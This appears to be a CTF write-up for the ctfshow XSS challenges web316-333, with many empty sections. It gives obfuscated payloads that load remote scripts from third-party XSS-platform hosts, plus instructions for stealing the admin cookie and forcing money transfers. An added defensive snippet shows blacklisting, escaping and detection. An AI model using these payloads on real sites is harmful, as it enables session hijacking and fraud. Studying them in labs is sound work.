Table of contents
- Preface
- web316
- web317-319
- One payload for several of the earlier challenges
- web320
- web321
- web322-324: ";" is filtered
- web325: "." is filtered
- web326: parentheses are filtered
- Generating the String.fromCharCode payload used above
- web327
- web328
- web329
- web330
- web331
- web332-333
- References
Preface
The payloads below still need to be URL-decoded by you. Most of them use an XSS platform for blind XSS (the link is at the bottom). Spaces are filtered, so use "/" in their place. Note that this may not really count as a writeup: I forgot to back up my notes, so make do with what is here and work out the underlying principles yourself.
web316
web317-319
One payload for several of the earlier challenges
```html
<input οnfοcus=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8veHNzOC5jYy8ySEpJIjtkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGEpOw== autofocus>
```
web320
web321
web322-324: ";" is filtered
```html
<body/οnlοad='document.write(String.fromCharCode(60));document.write(String.fromCharCode(115));document.write(String.fromCharCode(67));document.write(String.fromCharCode(114));document.write(String.fromCharCode(73));document.write(String.fromCharCode(112));document.write(String.fromCharCode(116));document.write(String.fromCharCode(32));document.write(String.fromCharCode(115));document.write(String.fromCharCode(114));document.write(String.fromCharCode(67));document.write(String.fromCharCode(61));document.write(String.fromCharCode(47));document.write(String.fromCharCode(47));document.write(String.fromCharCode(120));document.write(String.fromCharCode(115));document.write(String.fromCharCode(46));document.write(String.fromCharCode(115));document.write(String.fromCharCode(98));document.write(String.fromCharCode(47));document.write(String.fromCharCode(89));document.write(String.fromCharCode(84));document.write(String.fromCharCode(85));document.write(String.fromCharCode(104));document.write(String.fromCharCode(62));document.write(String.fromCharCode(60));document.write(String.fromCharCode(47));document.write(String.fromCharCode(115));document.write(String.fromCharCode(67));document.write(String.fromCharCode(82));document.write(String.fromCharCode(105));document.write(String.fromCharCode(112));document.write(String.fromCharCode(84));document.write(String.fromCharCode(62));'>
```
web325: "." is filtered
```html
<body/οnlοad=eval("\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x77\x72\x69\x74\x65\x28\x53\x74\x72\x69\x6e\x67\x2e\x66\x72\x6f\x6d\x43\x68\x61\x72\x43\x6f\x64\x65\x28\x36\x30\x2c\x31\x31\x35\x2c\x36\x37\x2c\x31\x31\x34\x2c\x37\x33\x2c\x31\x31\x32\x2c\x31\x31\x36\x2c\x33\x32\x2c\x31\x31\x35\x2c\x31\x31\x34\x2c\x36\x37\x2c\x36\x31\x2c\x34\x37\x2c\x34\x37\x2c\x31\x32\x30\x2c\x31\x31\x35\x2c\x34\x36\x2c\x31\x31\x35\x2c\x39\x38\x2c\x34\x37\x2c\x38\x39\x2c\x38\x34\x2c\x38\x35\x2c\x31\x30\x34\x2c\x36\x32\x2c\x36\x30\x2c\x34\x37\x2c\x31\x31\x35\x2c\x36\x37\x2c\x38\x32\x2c\x31\x30\x35\x2c\x31\x31\x32\x2c\x38\x34\x2c\x36\x32\x29\x29\x3b")>
```
web326: parentheses are filtered
```html
<body/οnlοad=eval("\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x77\x72\x69\x74\x65\x28\x53\x74\x72\x69\x6e\x67\x2e\x66\x72\x6f\x6d\x43\x68\x61\x72\x43\x6f\x64\x65\x28\x36\x30\x2c\x31\x31\x35\x2c\x36\x37\x2c\x31\x31\x34\x2c\x37\x33\x2c\x31\x31\x32\x2c\x31\x31\x36\x2c\x33\x32\x2c\x31\x31\x35\x2c\x31\x31\x34\x2c\x36\x37\x2c\x36\x31\x2c\x34\x37\x2c\x34\x37\x2c\x31\x32\x30\x2c\x31\x31\x35\x2c\x34\x36\x2c\x31\x31\x35\x2c\x39\x38\x2c\x34\x37\x2c\x38\x39\x2c\x38\x34\x2c\x38\x35\x2c\x31\x30\x34\x2c\x36\x32\x2c\x36\x30\x2c\x34\x37\x2c\x31\x31\x35\x2c\x36\x37\x2c\x38\x32\x2c\x31\x30\x35\x2c\x31\x31\x32\x2c\x38\x34\x2c\x36\x32\x29\x29\x3b")>
```
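The challenges above show the same lesson three times: a blacklist on ";", "." or "(" is defeated by re-encoding the same script. The example below is added here and is not from the original writeup or from ctfshow; it uses a stand-in blacklist (assumption: the real filter is not on the page) and constructed, inert samples in the shape of the payloads above, and shows that HTML-escaping the input before it is written into the page neutralises all of them, while also naming the obfuscation idioms a defender can log.

```javascript
// Added example, not from the original writeup. Stand-in for a ctfshow-style
// single-character blacklist (assumption: the real filter is not published here).
function blacklistFilter(input, bannedChars) {
  return ![...bannedChars].some(ch => input.includes(ch));   // true = accepted
}

// Output encoding for HTML text and quoted-attribute contexts: every character
// that can open or close a tag or attribute becomes an entity.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;', '/': '&#x2F;' };
  return s.replace(/[&<>"'\/]/g, c => map[c]);
}

// Detection: names of the obfuscation idioms present in the input.
function obfuscationSignals(input) {
  const signals = [];
  if (/eval\s*\(\s*atob\s*\(/i.test(input)) signals.push('eval-atob');          // base64 body in an attribute
  if ((input.match(/String\.fromCharCode/gi) || []).length >= 3)
    signals.push('fromCharCode-chain');                                         // web322-324 style
  if (/(\\x[0-9a-f]{2}){8,}/i.test(input)) signals.push('hex-escaped-literal');  // web325-326 style
  if (/<[a-z]+\/on[a-z]+\s*=/i.test(input)) signals.push('slash-for-space');    // "/" in place of a filtered space
  return signals;
}

// Constructed samples (ASCII handler names, placeholder base64, no real endpoint).
const SAMPLES = {
  atob: '<input onfocus=eval(atob(this.id)) id=ZXhhbXBsZQ== autofocus>',
  hex: String.raw`<body/onload=eval("\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x77\x72\x69\x74\x65\x28\x31\x29")>`,
};

// For one sample: does the blacklist let it through, and is it inert once escaped?
function evaluate(sample, bannedChars) {
  const escaped = escapeHtml(sample);
  return {
    passesBlacklist: blacklistFilter(sample, bannedChars),
    inertAfterEscape: !/[<>"']/.test(escaped),   // nothing left that can open a tag or attribute
    signals: obfuscationSignals(sample),
  };
}

console.log(evaluate(SAMPLES.atob, ';'));   // no ";" in it, so the blacklist passes; escaped form is inert
console.log(evaluate(SAMPLES.hex, '.'));    // the "." exists only as \x2e, so the "." blacklist passes too
```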
Generating the String.fromCharCode payload used above
web327
Note that the recipient is admin; there is no filtering.
web328
Self-hosted; the goal is to steal the admin's cookie.
Write a JS file.
Below is index.php.
Register an account with <script src=your-js-URL></script> as the name.
Then replace the cookie in your browser with the stolen one and visit the user management page.
web329
From this challenge on, the group owner made the cookie expire before it can be sent to you, so switch approach and fetch the page elements instead.
Self-hosted.
web330
web331
web332-333
One is a GET request, the other a POST request. The payload is similar to web331; the main idea is to make admin transfer money to a new account you registered, then buy the flag. You may also notice the challenge has a small bug: transferring money to yourself also makes the balance grow.
OK, considering everyone's level I'll post a payload for this one. The two challenges are GET and POST respectively. We know jQuery's ajax cannot carry cookies in a request, so it is a bit awkward, but a same-origin request gets around exactly that. First create an account named <script src=my-own-js-exploit-script, contents below></script>
(remember to map it to the public internet), then log in and log out, and create another account named y4tacker.
Sit back and wait for the money.
References
- https://www.cnblogs.com/hookjoy/p/6181350.html
- XSS platform: https://xsshs.cn/